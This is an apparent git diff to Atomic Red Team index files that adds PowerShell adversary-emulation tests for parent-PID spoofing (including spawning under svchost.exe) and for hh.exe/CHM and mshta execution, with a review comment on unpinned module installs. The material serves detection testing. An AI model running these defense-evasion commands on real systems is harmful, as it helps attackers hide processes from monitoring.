diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index df30d489..ac1ca6d0 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -38,6 +38,10 @@ privilege-escalation,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de
privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
privilege-escalation,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
privilege-escalation,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
privilege-escalation,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
@@ -245,6 +249,11 @@ defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using
defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
defense-evasion,T1218.001,Compiled HTML File,2,Compiled HTML Help Remote Payload,0f8af516-9818-4172-922b-42986ef1e81d,command_prompt
+defense-evasion,T1218.001,Compiled HTML File,3,Invoke CHM with default Shortcut Command Execution,29d6f0d7-be63-4482-8827-ea77126c1ef7,powershell
+defense-evasion,T1218.001,Compiled HTML File,4,Invoke CHM with InfoTech Storage Protocol Handler,b4094750-5fc7-4e8e-af12-b4e36bf5e7f6,powershell
+defense-evasion,T1218.001,Compiled HTML File,5,Invoke CHM Simulate Double click,5decef42-92b8-4a93-9eb2-877ddcb9401a,powershell
+defense-evasion,T1218.001,Compiled HTML File,6,Invoke CHM with Script Engine and Help Topic,4f83adda-f5ec-406d-b318-9773c9ca92e5,powershell
+defense-evasion,T1218.001,Compiled HTML File,7,Invoke CHM Shortcut Command with ITS and Help Topic,15756147-7470-4a83-87fb-bb5662526247,powershell
defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
@@ -339,6 +348,12 @@ defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-483
defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
+defense-evasion,T1218.005,Mshta,4,Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement,007e5672-2088-4853-a562-7490ddc19447,powershell
+defense-evasion,T1218.005,Mshta,5,Invoke HTML Application - Jscript Engine Simulating Double Click,58a193ec-131b-404e-b1ca-b35cf0b18c33,powershell
+defense-evasion,T1218.005,Mshta,6,Invoke HTML Application - Direct download from URI,39ceed55-f653-48ac-bd19-aceceaf525db,powershell
+defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell
+defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
+defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt
defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt
defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt
@@ -355,6 +370,10 @@ defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded P
defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 03989321..d7f2c379 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -25,6 +25,10 @@ privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Glo
privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
privilege-escalation,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
privilege-escalation,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
@@ -74,6 +78,11 @@ defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using
defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
defense-evasion,T1218.001,Compiled HTML File,2,Compiled HTML Help Remote Payload,0f8af516-9818-4172-922b-42986ef1e81d,command_prompt
+defense-evasion,T1218.001,Compiled HTML File,3,Invoke CHM with default Shortcut Command Execution,29d6f0d7-be63-4482-8827-ea77126c1ef7,powershell
+defense-evasion,T1218.001,Compiled HTML File,4,Invoke CHM with InfoTech Storage Protocol Handler,b4094750-5fc7-4e8e-af12-b4e36bf5e7f6,powershell
+defense-evasion,T1218.001,Compiled HTML File,5,Invoke CHM Simulate Double click,5decef42-92b8-4a93-9eb2-877ddcb9401a,powershell
+defense-evasion,T1218.001,Compiled HTML File,6,Invoke CHM with Script Engine and Help Topic,4f83adda-f5ec-406d-b318-9773c9ca92e5,powershell
+defense-evasion,T1218.001,Compiled HTML File,7,Invoke CHM Shortcut Command with ITS and Help Topic,15756147-7470-4a83-87fb-bb5662526247,powershell
defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
@@ -132,6 +141,12 @@ defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-483
defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
+defense-evasion,T1218.005,Mshta,4,Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement,007e5672-2088-4853-a562-7490ddc19447,powershell
+defense-evasion,T1218.005,Mshta,5,Invoke HTML Application - Jscript Engine Simulating Double Click,58a193ec-131b-404e-b1ca-b35cf0b18c33,powershell
+defense-evasion,T1218.005,Mshta,6,Invoke HTML Application - Direct download from URI,39ceed55-f653-48ac-bd19-aceceaf525db,powershell
+defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell
+defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
+defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt
defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt
defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt
@@ -147,6 +162,10 @@ defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded P
defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index c3805661..fd0c9ef3 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -89,6 +89,10 @@
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
+ - Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
+ - Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
+ - Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
+ - Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
- T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -499,6 +503,11 @@
- [T1218.001 Compiled HTML File](../../T1218.001/T1218.001.md)
- Atomic Test #1: Compiled HTML Help Local Payload [windows]
- Atomic Test #2: Compiled HTML Help Remote Payload [windows]
+ - Atomic Test #3: Invoke CHM with default Shortcut Command Execution [windows]
+ - Atomic Test #4: Invoke CHM with InfoTech Storage Protocol Handler [windows]
+ - Atomic Test #5: Invoke CHM Simulate Double click [windows]
+ - Atomic Test #6: Invoke CHM with Script Engine and Help Topic [windows]
+ - Atomic Test #7: Invoke CHM Shortcut Command with ITS and Help Topic [windows]
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.002 Control Panel](../../T1218.002/T1218.002.md)
- Atomic Test #1: Control Panel Items [windows]
@@ -650,6 +659,12 @@
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
- Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows]
+ - Atomic Test #4: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement [windows]
+ - Atomic Test #5: Invoke HTML Application - Jscript Engine Simulating Double Click [windows]
+ - Atomic Test #6: Invoke HTML Application - Direct download from URI [windows]
+ - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows]
+ - Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows]
+ - Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows]
- [T1218.007 Msiexec](../../T1218.007/T1218.007.md)
- Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows]
- Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows]
@@ -672,6 +687,10 @@
- Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
- [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
+ - Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
+ - Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
+ - Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
+ - Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
- [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index a067f6b0..8e5be8f7 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -62,6 +62,10 @@
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
+ - Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
+ - Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
+ - Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
+ - Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
- T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -153,6 +157,11 @@
- [T1218.001 Compiled HTML File](../../T1218.001/T1218.001.md)
- Atomic Test #1: Compiled HTML Help Local Payload [windows]
- Atomic Test #2: Compiled HTML Help Remote Payload [windows]
+ - Atomic Test #3: Invoke CHM with default Shortcut Command Execution [windows]
+ - Atomic Test #4: Invoke CHM with InfoTech Storage Protocol Handler [windows]
+ - Atomic Test #5: Invoke CHM Simulate Double click [windows]
+ - Atomic Test #6: Invoke CHM with Script Engine and Help Topic [windows]
+ - Atomic Test #7: Invoke CHM Shortcut Command with ITS and Help Topic [windows]
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.002 Control Panel](../../T1218.002/T1218.002.md)
- Atomic Test #1: Control Panel Items [windows]
@@ -255,6 +264,12 @@
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
- Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows]
+ - Atomic Test #4: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement [windows]
+ - Atomic Test #5: Invoke HTML Application - Jscript Engine Simulating Double Click [windows]
+ - Atomic Test #6: Invoke HTML Application - Direct download from URI [windows]
+ - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows]
+ - Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows]
+ - Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows]
- [T1218.007 Msiexec](../../T1218.007/T1218.007.md)
- Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows]
- Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows]
@@ -276,6 +291,10 @@
- Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
- [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
+ - Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
+ - Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
+ - Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
+ - Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
- [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 8ab000e2..aadbbec2 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -4496,6 +4496,134 @@ privilege-escalation:
Stop-Process -Name "#{dll_process_name}" -ErrorAction Ignore
Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
name: powershell
+ - name: Parent PID Spoofing - Spawn from Current Process
+ auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25
+ description: Spawns a powershell.exe process as a child of the current process.
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_path:
+ description: File path or name of process to spawn
+ type: path
+ default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+ parent_pid:
+ description: PID of process to spawn from
+ type: string
+ default: "$PID"
+ command_line:
+ description: Specified command line to use
+ type: string
+ default: "-Command Start-Sleep 10"
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine
+ ''#{command_line}'' -ParentId #{parent_pid}'
+ name: powershell
+ - name: Parent PID Spoofing - Spawn from Specified Process
+ auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb
+ description: Spawns a notepad.exe process as a child of the current process.
+ supported_platforms:
+ - windows
+ input_arguments:
+ parent_pid:
+ description: PID of process to spawn from
+ type: string
+ default: "$PID"
+ test_guid:
+ description: Defined test GUID
+ type: string
+ default: 12345678-1234-1234-1234-123456789123
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid
+ #{test_guid}'
+ name: powershell
+ - name: Parent PID Spoofing - Spawn from svchost.exe
+ auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591
+ description: Spawnd a process as a child of the first accessible svchost.exe
+ process.
+ supported_platforms:
+ - windows
+ input_arguments:
+ command_line:
+ description: Specified command line to use
+ type: string
+ default: "-Command Start-Sleep 10"
+ file_path:
+ description: File path or name of process to spawn
+ type: path
+ default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine,
+ ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" |
+ Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path}
+ -CommandLine ''#{command_line}'''
+ name: powershell
+ - name: Parent PID Spoofing - Spawn from New Process
+ auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db
+ description: Creates a notepad.exe process and then spawns a powershell.exe
+ process as a child of it.
+ supported_platforms:
+ - windows
+ input_arguments:
+ command_line:
+ description: Specified command line to use
+ type: string
+ default: "-Command Start-Sleep 10"
+ file_path:
+ description: File path or name of process to spawn
+ type: path
+ default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+ parent_name:
+ description: Parent process to spoof from
+ type: path
+ default: "$Env:windir\\System32\\notepad.exe"
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent
+ -FilePath #{file_path} -CommandLine ''#{command_line}'''
+ name: powershell
T1034:
technique:
id: attack-pattern--c4ad009b-6e13-4419-8d21-918a1652de02
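Review bot: The `get_prereq_command` of each of the four new Parent PID Spoofing tests installs AtomicTestHarnesses with `-Force` and no version pin, while the paired `prereq_command` only checks that the module and the `Start-ATHProcessUnderSpecificParent` export exist, so the harness code that actually runs on the endpoint is whatever the gallery serves at install time; the same pattern repeats in the Compiled HTML File hunk below and in the Mshta hunk after it. That is a supply-chain exposure for code executed on test hosts and makes results non-reproducible across runs; pinning the install, e.g. `get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -RequiredVersion <PINNED_VERSION> -Scope CurrentUser -Force'` (placeholder version), and having `prereq_command` check that same version would address both. The description of the "Spawn from Specified Process" test, `Spawns a notepad.exe process as a child of the current process.`, reads as copied from the preceding test and does not reflect its `parent_pid`/`test_guid` arguments, and the "Spawn from svchost.exe" description has the typo `Spawnd`. Since this index file appears to be generated from the per-technique YAML, these fixes presumably belong in the T1134.004 source file rather than here.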
@@ -22968,6 +23096,174 @@ defense-evasion:
'
name: command_prompt
+ - name: Invoke CHM with default Shortcut Command Execution
+ auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7
+ description: Executes a CHM file with the default Shortcut Command method.
+ supported_platforms:
+ - windows
+ input_arguments:
+ chm_file_path:
+ description: Default path of CHM
+ type: string
+ default: Test.chm
+ hh_file_path:
+ description: path of modified HH.exe
+ type: path
+ default: "$env:windir\\hh.exe"
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath
+ #{chm_file_path}'
+ name: powershell
+ - name: Invoke CHM with InfoTech Storage Protocol Handler
+ auto_generated_guid: b4094750-5fc7-4e8e-af12-b4e36bf5e7f6
+ description: Executes a CHM file with the ITS protocol handler.
+ supported_platforms:
+ - windows
+ input_arguments:
+ hh_file_path:
+ description: path of modified HH.exe
+ type: path
+ default: "$env:windir\\hh.exe"
+ infotech_storage_handler:
+ description: Default InfoTech Storage Protocol Handler
+ type: string
+ default: its
+ chm_file_path:
+ description: Default path of CHM
+ type: string
+ default: Test.chm
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler}
+ -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}'
+ name: powershell
+ - name: Invoke CHM Simulate Double click
+ auto_generated_guid: 5decef42-92b8-4a93-9eb2-877ddcb9401a
